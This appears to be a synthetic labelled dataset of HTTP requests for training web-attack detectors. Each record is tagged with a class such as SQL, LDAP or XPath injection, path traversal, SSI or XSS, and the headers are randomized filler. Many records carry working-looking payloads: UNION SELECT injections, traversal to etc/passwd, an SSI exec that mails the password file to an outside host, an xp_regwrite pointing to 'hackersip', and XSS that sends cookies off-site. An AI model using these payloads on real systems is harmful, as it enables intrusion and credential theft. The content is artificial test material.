Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 878025809262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39735
Start - Id: 37481
class: LdapInjection
GET /o60hrC/mR0Qt3asp8eP/HC6Ag/tMEmjAE8BBTswFfVHCe/KqO5/u3_.jpeg?HeSteahst=tJeRpesln&oceRac=Mrty1xdeugheohgwoh&nletfsei=ehb84CayVOfX&lret=hs&pKxnpnrE75indo=%2F%3Ee%7Eso%26e%27zzx-rservicese%5Chh&Socdlmheeyiilst=52&hjIniltesoorrn=51933&5wbTit=tox2%40Dt HTTP/1.1
Host: 53.221.9.114
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342, x-mac-roman;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 109.40.195.249
Cookie: dcidlueehy2wc=o&1u;eeshsChdhane=eieqokatthdiGbSzi;iadiy0=")(targetfilter=(o=NetscapeRoot))
Cookie2: $Version="465"
Date: Sun, 09 Jul 06 07:19:04 GMT
ETag: W/"L6X0pwNyT5dRC697e7E"
Expect: ccve0ahu=joiosvw
From: i2eeh@yhiguo.be
If-Modified-Since: Mon, 07 Apr 08 24:34:38 GMT
If-Unmodified-Since: Tue, 12 Dec 06 24:17:19 GMT
If-Match: "rJagS4cD3n-jn5TGg"
If-None-Match: "irONd2UjmLtgiUGY.UK"
If-Range: Thu, 21 May 09 08:00:59 GMT
Max-Forwards: 57
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: lnoca lnaAdl7=18do9hha
Authorization: Digest algorithm=of5id
Range: 19-659
Referer: http://www.o4qaE.be/ksl7/3hTAcr/r1ng/wa7pit.jpg
TE: chunked;q=0.7,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.3 (compatible; neetepi; Windows NT; 5erM)
UA-Disp: 6467,4421,8
UA-OS: Windows NT
UA-Color: color32
Via: omiec/7.6 www.isOrbl.shtml
Transfer-Encoding: gzip
Warning: 677 51.35.224.146 "edtba6i7Eepe" "Sun, 25 Jan 04 03:07:08 GMT"
X-Forwarded-For: 84.127.146.130
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37481
Start - Id: 41418
class: SqlInjection
POST /icR/o3tIvUm-_HXZI.NIgMGL/h3yalrsia/rREJ/a9tl/tsvT8w/nXYpeNR75/qf4-b_vunion8P/Ae/sO5Si/p8SSb/m1X.pl? HTTP/1.1
Content-Length: 244
Content-Language: ado,4rs,dTihfsnd
Content-Encoding: compress
Content-Location: http://tceIpN8o.fr/fd0ds/lamdNi/axcaDs9.swf
Content-MD5: ZGdhcWwzdGhlaDdvb3NvUw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Jan 08 02:24:20 CET
Last-Modified: Thu, 31 Aug 06 12:53:31 CET
Host: www.IbAjf0wy.org
Connection: close
Accept: text/html;q=0.6, audio/x-wav, text/xml
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=87
Client-ip: 180.8.150.200
Cookie: a7at=6
Cookie2: $Version="458"
Date: Tue, 16 Sep 08 17:56:07 GMT
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: 100-continue
From: eznB@Adtctleba.uk
If-Modified-Since: Wed, 12 Nov 08 18:53:54 GMT
If-Unmodified-Since: Mon, 27 Dec 04 14:39:41 UTC
If-Match: "FTba.-n9fS1b70R"
If-None-Match: "ovDEwK4quk4sKKVf"
If-Range: Tue, 08 Sep 09 05:55:04 GMT
Max-Forwards: 34
MIME-Version: 2.2
Pragma: 0ozao='ynh'
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: otrr xiR66mil=vOls
Range: 4509-,62-022408,-4198
Referer: http://www.hraitae.com/oaEi/xdntq.pl
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.4 (Windows; U; Windows NT 8.1; es-on; rv:0.8.7) Gecko/16641109
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 738x118
Via: 9.1 www.6varh.shtml, 8.1 www.efeTsosP.jpg
Transfer-Encoding: identity
Upgrade: rht/5.4
Warning: 149 193.52.96.248 "8Xhauustfrrwxeheore" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 9168693821015244526
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fa0tc4ei=')    UNION   ALL SELECT   931,1,323,37,6 FROM     esEFtvdEig WHERE (    '' =    '&e4errzn=jr3gQXesC&raoq0gu4Doe0=CcabetweenPpid $nY8&i9pcfdm2otgbrs=5477301&LennTfuadlerla=996&8GWbgsoundffr=ogo mL)a&39wiiosm=6

End - Id: 41418
Start - Id: 46092
class: PathTransversal
POST /Tuqzi/w3yUZTIYI9/q3gebQ/srLGFA5si3Aol13gR94/lzcsagai.jsp? HTTP/1.1
Content-Length: 214
Content-Language: lnq
Content-Encoding: deflate
Content-Location: /epbz/e2rapeon/Oeiandd/ar2qi/nllNfhu.pl
Content-MD5: aXRpcG9obEV0bHVENmF5dg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Feb 10 04:42:56 UTC
Last-Modified: Fri, 14 Sep 07 06:10:07 UTC
Host: www.Ieaaurmtbe.it
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 189.254.153.1
Cookie: Lm_KkQizAJP0=u.ahgmNBPetu;mHreWyrt=14112202;zn1eosm0rsdkA=tADqcC3C;eaSre=i0bsis$Fnmb(eyt;6anasstzg=aAo;lbtGnnpwmv=UG3yndehefeusesy
Cookie2: $Version="065"
Date: Mon, 08 Jun 09 24:34:45 CET
ETag: W/"TbF8453pah_RFw4TC"
Expect: Siau=psbut;juzsygh
If-Modified-Since: Sun, 02 May 04 14:06:45 UTC
If-Unmodified-Since: Thu, 23 Jul 09 21:35:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Sep 08 23:14:17 CET
Max-Forwards: 7774
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: stfTUt reBwpr6d=aluesSr
Referer: /rhecC.jpeg
TE: trailers,deflate;q=0.8
Trailer: Date
User-Agent: Mozilla/9.4 (Windows; U; Win 9x 0.8; 9h-xH; rv:8.8.2) Gecko/11112080
UA-CPU: x86
UA-Disp: 0405,3924,32
UA-Color: color32
UA-Pixels: 1090x096
Via: 7.5 www.izaed5n.html:5178, 4.2 201.40.5.226
Transfer-Encoding: compress
Warning: 725 2.115.234.163 "nhM0estysig8nhena" "Sat, 25 Mar 06 01:22:22 UTC"
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 2944853437474808698
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3ankeioamsad=oaE&smtrtd=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&4%u9SG3lWC-=m&6mHYcep=437328421&nrOia=i6a&lIat3=kt%27tst%40ZtwTihJ

End - Id: 46092
Start - Id: 37849
class: LdapInjection
GET /jAvIjopendz8L1O5_/oAsemeto/stEea/emeg.ZwCho/s6NEuLajaXG87/jQlinkYM/ykyub.mdb?nab=nnZi8Nz&41destw=mtri&ritfncopt=nh2lacceptp&TsGsmb6ctado=Siitonheauoa&oCopencopyR=adMle%29%28%26%28objectClass++%3D++++yl*%29 HTTP/1.0
Host: 37.127.14.15
Connection: keep-alive
Accept: image/png;q=0.7, image/gif;q=0.1, image/gif;q=0.7
Accept-Charset: windows-1252;q=0.5, utf-7, iso-8859-9;q=0.0
Accept-Encoding: compress, compress, deflate;q=0.4, identity;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 196.7.188.193
Cookie: siasiNaaautue=8WdRjXt6;eSG3=l3IEDjh3jNq;eabjr=st;omiaathernyaCmn=$=a;enceh47=82481;I1tPzrZtq=e4(ehdropHu<mta|
Cookie2: $Version="033"
Date: Sun, 23 Apr 06 18:55:44 UTC
ETag: "v.u7W79d5gfnlTy"
Expect: dhfasa=tehi4Sz;l9ae
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sun, 14 Mar 04 06:29:18 UTC
If-Unmodified-Since: Wed, 30 Jan 08 18:20:54 GMT
If-Match: *
If-None-Match: "sELIoXwqQnT6CfBa9"
If-Range: Wed, 27 Jan 10 04:37:44 GMT
Max-Forwards: 935
MIME-Version: 3.3
Pragma: keZrmoo='hpAe'
Proxy-Authorization: NTLM emh5cDRTbWlJb2U3anRzeXJkOW9pY3NiOWhhYWQ0aXNldA==
Authorization: NTLM ZUVydnJlZWVpb3YzcnJyamVydElkYW80bm9kZWVvaXc=
Range: 853418-,-430
Referer: http://Aetyn.org/9eswse/hegxe6ao/oonnno.tiff
TE: chunked,trailers
Trailer: Referer
User-Agent: Mozilla/9.3 (compatible; Ieebeayxe; Open BSD i586; Nu0eHsl; Eeeceou9t)
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 878x215
Via: 4.3 198.154.35.115, 8.2 67.23.2.79, 5.9 254.55.179.110
Transfer-Encoding: gzip
Upgrade: uoE/5.1, iitjl/6.0
Warning: 381 69.182.116.155 "Nlsokote2jdearNL" "Fri, 14 Nov 08 18:53:43 CET"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37849
Start - Id: 40109
class: SSI
GET /wE_yQwEZdx/aecnmtiikducset/tl/eN0Ha/hreee3eo3nhoea/fAS_gXBN0KjIk/fxprNhad_fe/tl/aMCLcsqL/irc/iNhRWo@N.htm?Itfttedjh=i6p&Z5yz6D4Mbscript=13119768&as9ic9t=74&fpesCtzeio6T6=8qvt&vesbeels=iZQRxdJSUwo&robdrm=%3C%21--++++%23exec++cmd%3D%22%2Fbin%2Fmail++ctiper9s7r.com++++%3C++%2Fetc%2Fpasswd%22--%3E&elstesioliwBe=995&drereet0i=5shretKEn&cony1shIrt=s9Hnw&epl=mtirgaeartm3dbu HTTP/1.0
Host: www.asaemos.com
Connection: psHetoc
Accept: */*
Accept-Charset: iso-8859-15, iso-10646-ucs-2, x-mac-cyrillic;q=0.7
Accept-Encoding: identity;q=0.6, gzip;q=0.2
Accept-Language: srma-m;q=0.3, ia-miesyteD;q=0.5
Cache-Control: t=e6Gn
Client-ip: 9.112.225.81
Cookie: ten37dt=990;lsloghH@E=5796509736
Cookie2: $Version="674"
Date: Sat, 25 Apr 09 15:12:47 GMT
ETag: W/"6KWbDiR9VCPNPe0wfV"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Tue, 14 Sep 04 16:48:39 GMT
If-Unmodified-Since: Thu, 19 May 05 15:15:57 CET
If-Match: "nGGi7ip3wdZZ8Whi_Q"
If-None-Match: "5MNAK_f_5rZ6ySUFBG"
If-Range: "kznuwC@gtW5NbrLTnz6"
Max-Forwards: 878
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: rxlppx muowon6=meWd
Authorization: lcb2Rh 8feofloz=9eso
Range: 12545-4
Referer: /oLd2H/rdqan.mspx
TE: deflate
Trailer: Proxy-Authorization
User-Agent: lie7ydutp
UA-CPU: 68000
UA-Disp: 3405,153,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7286x8366
Via: la2u/1.6 www.rfprsI.jpg
Transfer-Encoding: identity
Upgrade: Iisgx/0.5, asoins/6.2
Warning: 525 47.98.135.216 "dlaiinerst" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 606454137105
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40109
Start - Id: 35507
class: XPathInjection
GET /nIttaiblhnekMcgotnf/t3peUdkCr4UfMv/tUX/cZu_Q8metar8d.htm? HTTP/1.0
Host: 6.195.137.55
Connection: close
Accept: image/*;q=0.8, video/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-stale
Client-ip: 252.38.19.19
Cookie: Ita=nmknahlu' or    6     <    count(path/child::*)     or  'NBaniAa'  =    ';dpwbIletsrWNrnx=gienechoahp)phpftpEie3op;D9suo=jR2IRKTYZ;m1inUoysnEhxpee=629
Cookie2: $Version="9"
Date: Wed, 21 Dec 05 11:00:09 CET
If-Modified-Since: Mon, 04 Aug 08 18:56:22 UTC
If-Unmodified-Since: Tue, 27 Jan 04 16:49:46 UTC
If-Match: "errOkRYScGRzTeQOZh"
If-Range: *
Max-Forwards: 83
MIME-Version: 1.6
Pragma: fl9IUn8='eaggoos'
Range: 4-,5-57,378-
Referer: /sido/h8Xa/reehohe.mpg
User-Agent: Mozilla/7.4 (compatible; Konqueror/4.0; Open BSD i586; hded; MDiDiir; oiwbzdat)
UA-CPU: Sparc
UA-OS: FreeBSD
Via: 9.3 www.ccspoha.tiff
Transfer-Encoding: deflate
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35507
Start - Id: 49290
class: XPathInjection
GET /ahiqmL8K/a0KpiCT6e516NR4/Ehd50xDjSEuNk/lYyEyo@9S0Jrg/o9kvC2D.2T/uthdyeeo7cr/7yrKgyllmYgD6ai4ty6/uem/rHsttcp5pmepT.msf?meIAb9swie=obnc&xHvtcsLg=mnmdtsc3eynTe&8fasN5agmr=l&adhees2mqsA=%2Becms&odhs2orn0iia=34826&ie4scTtso3=9&o1l=mubt&V1brrnn=571587&e8if=NeE%27+++++or+++1%3C+++ejoaan%2FTrh%2F7j%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D8%5D+++or+++%27rs%27++%3D++%27&adminNWqvVK=iBJf8ZH&enc2T0e0mba=x&8hgCnndOIaerrs=ihBI&rhgltie0=ntTlzthfnder HTTP/1.1
Host: www.nenceh.st
Connection: tyyiNsoe
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: aeuv0q0-s7, jo7-ha;q=0.7, rran-ept7oshe;q=0.1
Cache-Control: only-if-cached
Client-ip: 226.125.42.173
Cookie: acceptGdX=50500666;els3aDndeTfnfad=3
Cookie2: $Version="213"
Date: Tue, 15 Aug 06 21:00:12 GMT
ETag: "kip5j5ec5RFhUSVhtKck"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sun, 19 Jun 05 09:51:40 UTC
If-Unmodified-Since: Tue, 24 May 05 24:14:54 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Digest username="eo0oTwp"
Range: 305761-528973
Referer: /LYak/csr9jiEe/snRzzt/eLtttre.aspx
TE: deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/0.9 (compatible; rmatvit; SunOS sun4u; tebi4; ieams)
UA-CPU: Sparc
UA-Disp: 284,977,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7888x6205
Via: Ecne/2.1 177.112.49.91:5, sA1/5.1 140.70.60.237:7405, 1.8 61.255.198.206
Transfer-Encoding: tnnc
Upgrade: eso/2.4, aboa/1.7
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 137.94.37.177
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49290
Start - Id: 35055
class: SqlInjection
GET /w_@G8/uidesznq/oeoe1rQilonno/EEtHa8pgtntxkseg5gro/Tu5OUA1ESiN6/n_7xlNRZdkSGlZY/bIpXAFFLtGVQwUmRb/eOttiyLochwun/eer3sko06ytpcotee2i/bur/CVq2Znph-/aF.js?rxntiect=exec+++xp_regwrite++++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27xb6t6egti%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27 HTTP/1.1
Host: www.psao7nmr.de
Connection: esrhis0
Accept: image/jpeg;q=0.9, image/gif
Accept-Charset: windows-1258;q=0.1, windows-1255, x-mac-hebrew
Accept-Encoding: identity, deflate, identity, deflate, compress;q=0.8
Accept-Language: r4caul-htts9;q=0.2
Cache-Control: no-store
Client-ip: 243.80.185.17
Cookie: VvinXpsGtetcZS=dsx5rraoewnbr5
Cookie2: $Version="16"
Date: Fri, 01 Dec 06 02:48:44 GMT
ETag: "WafdUY6zudi3PdKk7Olr"
Expect: 4en1t=spype;iksuo0L=mtJuin
If-Modified-Since: Sun, 08 Mar 09 24:13:04 CET
If-Unmodified-Since: Wed, 21 Nov 07 19:30:39 CET
If-Match: "9ZYLA89ve9xKQ.Kx"
If-None-Match: *
If-Range: Thu, 16 Nov 06 05:57:12 UTC
Max-Forwards: 63
MIME-Version: 0.3
Pragma: stthou='n'
Proxy-Authorization: PnTt stlaaah0=afAAao6
Authorization: Digest username="rtnn"
Range: -4,7-,2698-
Referer: /lcEeal/jnHEhekt/amas92/9iopa/en1eYish.aspx
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: aWYXAHFVZ http://www.el9y.com
UA-CPU: StrongARM
UA-OS: Windows NT
UA-Color: color16
Via: uytu/5.4 www.wgae9.js, 7.1 www.lcgi1oee.jpg
Transfer-Encoding: identity
Upgrade: l5i/1.7, lDqw/9.3, ade/1.3, rst/9.9
Warning: 825 www.eezs.png:4813 "dnlyiz8ddawi9eucren" 
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35055
Start - Id: 47216
class: XSS
GET /ter/AettebjaTtdhfr/inh/teL0d/iCkoCeds/lQKc/itKQyUn@_k7H/dedFSLifgWN1S1NB/bFcfacAnFbflA/g@c9jjo/hcaceatsdldrtbu/pdIhaL.dll?hsoaee=%3C%3Cscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F123.143.175.36%2Fndnale.sh%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E HTTP/1.1
Host: 222.223.188.70
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.1, gzip, compress;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 220.86.207.11
Cookie: ZLgtelnet_=594649;era=fNd-X;uoes8his0ui4a=ecolaHmU;UJVB6GXL= aeahv
Cookie2: $Version="87"
Date: Sun, 14 Dec 08 24:19:09 UTC
ETag: "sffq97EglwyE3Ups"
Expect: bpHcbrce
From: sHag@lasiBra.be
If-Modified-Since: Fri, 12 Feb 10 05:51:03 UTC
If-Unmodified-Since: Mon, 14 Sep 09 21:01:00 UTC
If-Match: "tRlkqTuA.5ZfWZfFKs"
If-None-Match: *
If-Range: "ej1u75kNnOtKjbGRB1C"
Max-Forwards: 27
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Basic YzNpdHI6c2JocTl0
Range: 4321-2
Referer: http://www.qAse.de/6mse8gz/irN9e/hr4lqwes/ab7eR/Atibnn.cfm
TE: gzip
Trailer: Range
User-Agent: Mozilla/0.6 (X11; U; Open BSD i586 2.2; eE-eh; rv:2.4.5) Gecko/57110673
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 286x017
Via: 2.4 www.iteobo.png, Aqni/3.3 23.89.217.51, eautm/5.4 www.kaEt.tiff
Transfer-Encoding: compress
Upgrade: sdloi/4.2, a9og/5.3, Who9/3.5
Warning: 326 133.104.64.243 "thlBedsxran6eholh" 
X-Forwarded-For: 255.235.206.195
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47216
Start - Id: 39751
class: SSI
GET /mI.3HHe1P/.EHdi.3o/VRpjtmp8N2k.php?owR2x2Mkcat-v=hano&t6efeosgir930=4&Vij5=mJE56w&N1esddfUaa=bvWlc1_-rYMx&qOew=Irgroup+byxterm+h+&jNGSS=feorfromewinnttuhttpsbnfitt%28%25o&donhmhnbn=4djibs&Ieasctgn=ei&5dmTtasfaanad=%3C%21--++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22--%3E&9btoke=imjs%40bQ7YL HTTP/1.0
Host: www.rEtedhweit.ch:80
Connection: phRj
Accept: audio/*;q=0.4, text/*;q=0.1
Accept-Charset: big5, us-ascii, windows-1254;q=0.3, x-mac-cyrillic
Accept-Encoding: deflate
Accept-Language: eoJt6-aeRosddg, Ei-aag, oap-c;q=0.3, m-nEoXE
Cache-Control: max-stale
Client-ip: 11.1.136.106
Cookie: nUysWtelnet4Kall=2(1o
Cookie2: $Version="098"
Date: Mon, 01 Aug 05 16:12:10 UTC
ETag: W/"GkJ_THAtFpr_JVbdPoW"
Expect: 7atT=ybaN
From: n4tbla@ol8e.st
If-Modified-Since: Wed, 10 Sep 08 20:36:41 GMT
If-Unmodified-Since: Fri, 31 Dec 04 10:08:36 CET
If-Match: "hdKwoB-gsr5C2jZDq"
If-None-Match: "Sxgz__kQ-nNDn4X6yIs"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: reaDt emvtgetu=inssramo
Range: 85-,34121-
Referer: http://www.uosart.fr/ssnw/sd1aoeo.php
TE: trailers
Trailer: Date
User-Agent: Mozilla/6.3 (X11; U; Solaris 0.7; wd-wa; rv:9.3.0) Gecko/61136880
UA-CPU: 68000
UA-Disp: 377,8023,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: 6.4 224.169.35.54
Transfer-Encoding: identity
Upgrade: ti5dle/9.6, cdcl/9.9, hne5h/3.5, uet/1.4
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 141.175.190.115
X-Serial-Number: 37299896
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39751
Start - Id: 40757
class: SSI
PUT /yIti4aaesEueoGnhbrd/bssrosZyvta/7k/tiTwfonthkaUAxgaDeq.shtml? HTTP/1.0
Content-Length: 357
Content-Language: ujbo,hsai1lth,ihail
Content-Encoding: identity
Content-Location: http://www.0tAvteei.biz/PDznq/nneIe5/avBa/0aenaic.sh
Content-MD5: aW95YW5oaHNlUnNkaTFhTg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Mar 07 06:23:14 CET
Last-Modified: Tue, 31 Jan 06 22:52:31 UTC
Host: 241.184.236.77
Connection: close
Accept: */*
Accept-Charset: windows-1251, windows-1258, x-mac-arabic;q=0.4, iso-8859-9
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=63011
Client-ip: 166.41.33.129
Cookie: ihab8=atewerl4nrodos7scf;18dnp9a=tdazDzmlDGD;iIbeeyo=awgse8sh;taibnoml=7795183019;oNd1yioawod=tit;rpfoa=mbody
Cookie2: $Version="935"
Date: Tue, 06 Jan 04 09:02:15 GMT
ETag: W/"StD9lTanH-1yt1o"
Expect: ehd9o
From: aits@9datnm.uk
If-Modified-Since: Wed, 18 May 05 21:34:40 CET
If-Unmodified-Since: Fri, 14 Mar 08 23:03:28 GMT
If-Match: *
If-None-Match: "kqtHaqiIYu5K5uLb@f"
If-Range: "EsMwW-wwJZlAOTrJ2d"
Max-Forwards: 9
MIME-Version: 8.0
Pragma: a=rwagdaok
Proxy-Authorization: NTLM SW5hcmx0ZTA2Zmk3ZWt0bGUxZW50aHNpaFJvcm5wc2llZWFlZXVkbmF0cWxh
Authorization: Digest response="1Ed1304da8fcfFAe8991Ad5B48185A87"
Range: -5,-6430,4139-
Referer: /acodbult/mit9doh/Pviitao7/aHntlnd/nnLopE.bin
TE: trailers,gzip,trailers
User-Agent: telrtm/3.1.3.8.7
UA-CPU: MIPS
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: urtex/7.8 www.Sib1r.html, 3.6 70.226.250.186:394, 0.7 www.uhy2dur.gif
Transfer-Encoding: aepo; dote=yhrmrgd
Upgrade: etg/2.7
Warning: 515 255.26.146.194 "etiqarDie" 
X-Forwarded-For: 31.100.82.188
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

ubodyk4IXC0CI=nhnexece?xmlupi)&etqiOaren56cH=dnMGG&rPhPtmputmpGd=tsock_stream:toE\a&6Polr0reSrne3in=xh&qBV9@nc= from'&tbdes1OI=79254630&hfbh=a.t&eeNrZj7eteto=ye&orscrirmrdat=2043&cl0tnoywmfleUmp=jgndtmp&cjstefIZ3EAd=<!--  #odbc    statement = "select     tb, acv,  un   from nbat8mryaT     order  by    7,    477,     5"  -->

End - Id: 40757
Start - Id: 49867
class: XPathInjection
GET /w1kpd/eyhh5nOzx/g7CFHml0@uCiX1CI/ea/UU8wj8/nto7li/n1jeboa9xen.msf?petTe0onaewewsr=nWhy&bxoen=xrp6Wbo%27+or+++++1%3C+++++er%2FE%2Fb6s%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D1%5D+++++or+++%27neol0s%27%3D+++%27 HTTP/1.0
Host: 51.79.86.154
Connection: 10wumo
Accept: */*;q=0.7
Accept-Charset: iso-2022-jp;q=0.8, iso-8859-8, x-mac-arabic;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 45.244.106.212
Cookie: QAfP238includePnode= mtk 0etc;gs=oat;uBoZAlhavingJ=frsilbreoeR;SmmidDiss5iy1ya=plOe?rli0swget?s+r~s;w7it80vboot.iniMmhK=ah&sosinputu e8R9;ir0zmreilE=es$eo 
Cookie2: $Version="5"
Date: Sat, 20 Mar 04 16:44:02 CET
ETag: "xcInQ_66Zglzx9B"
Expect: lbaehdv
From: eslc7@67owp.net
If-Modified-Since: Sat, 14 Jul 07 07:52:09 UTC
If-Unmodified-Since: Thu, 28 May 09 03:12:12 UTC
If-Match: *
If-None-Match: *
If-Range: "3oI85smExYicW8c7yHH_"
Max-Forwards: 09
MIME-Version: 4.0
Pragma: str='estaal'
Proxy-Authorization: Basic ZWVic2FsVDp0c2VyZQ==
Authorization: NTLM ZWVqV3N1OWVUYXJxc3puaXFzUmJlaWExZHRldG5maXR4ZTF0ZQ==
Range: 40331-8,658595-,136-
Referer: http://7nsyimeO.uk/asmh/yRzrltm/rsTCr/hyeaqjn/r4sa.ace
TE: trailers
Trailer: Accept-Encoding
User-Agent: iaybietfle/2.1
UA-CPU: x86
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: 1.6 www.rretotgm.html, 0.4 www.igks.htm:472, aeeiet/2.1 201.80.59.254
Transfer-Encoding: gzip
Upgrade: hiv/6.0, 8geb/7.6, ssu82v/5.0
Warning: 968 www.Iurrcesn.jpg "rFd4tdex5ohayei4iC" "Wed, 21 Nov 07 23:43:23 CET"
X-Forwarded-For: 24.251.121.187
X-Serial-Number: 5095784293385
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49867
Start - Id: 42263
class: SqlInjection
GET /tj4EM1bmewLzMTbDB.php3?ys3=naaauq3Gu&741daxr=%3Esi%2BO&PUJ7dh=u9lyljqZqE&ex3lOlj9ns7cpoa=449717&zmbnce=9&tDpa=6637128&JamEd=lvshenGc&Ooe=ss&rdpdie=%27++%2B+++++%28++++SELECT+++TOP+++1+Hutl7Une+++++FROM+tiOn%29++%2B+++++%27&l3eqhaqty=ao&l9sIsa6ee5o=3gcopy%26 HTTP/1.0
Host: www.iteeulsl.uk
Connection: close
Accept: audio/*, image/jpeg, video/mpeg;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: t-prJTior;q=0.8, wxuihtbf-ticd;q=0.8
Cache-Control: only-if-cached
Client-ip: 162.212.24.46
Cookie: intf=am.i_vv;aoinlyr4=55;brh=n\3~;tgi=540155;nslr=t20D.oF
Cookie2: $Version="528"
Date: Tue, 02 Mar 04 19:58:28 UTC
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: eethwr@T5iivnsieh.be
If-Modified-Since: Tue, 10 Apr 07 07:54:03 CET
If-Unmodified-Since: Sun, 14 Aug 05 02:31:43 UTC
If-Match: "lxlWcYMj7Y3KNOJ7c"
If-None-Match: "7sQpvDzf-HF7pA5dBkn"
If-Range: Fri, 13 Aug 04 17:33:19 GMT
Max-Forwards: 5
MIME-Version: 6.9
Pragma: ds=si4
Proxy-Authorization: Digest opaque="7ytlNcaS"
Authorization: Basic dG9sYzoyNGFyd2M=
Range: 041331-40746,8485-207,-9
Referer: /6tfeetgn/Herde9o/rae5Cl.gif
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: odsse/3.6.4.0.5
UA-CPU: Sparc
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4325x083
Via: FTP/0.7 114.157.144.189
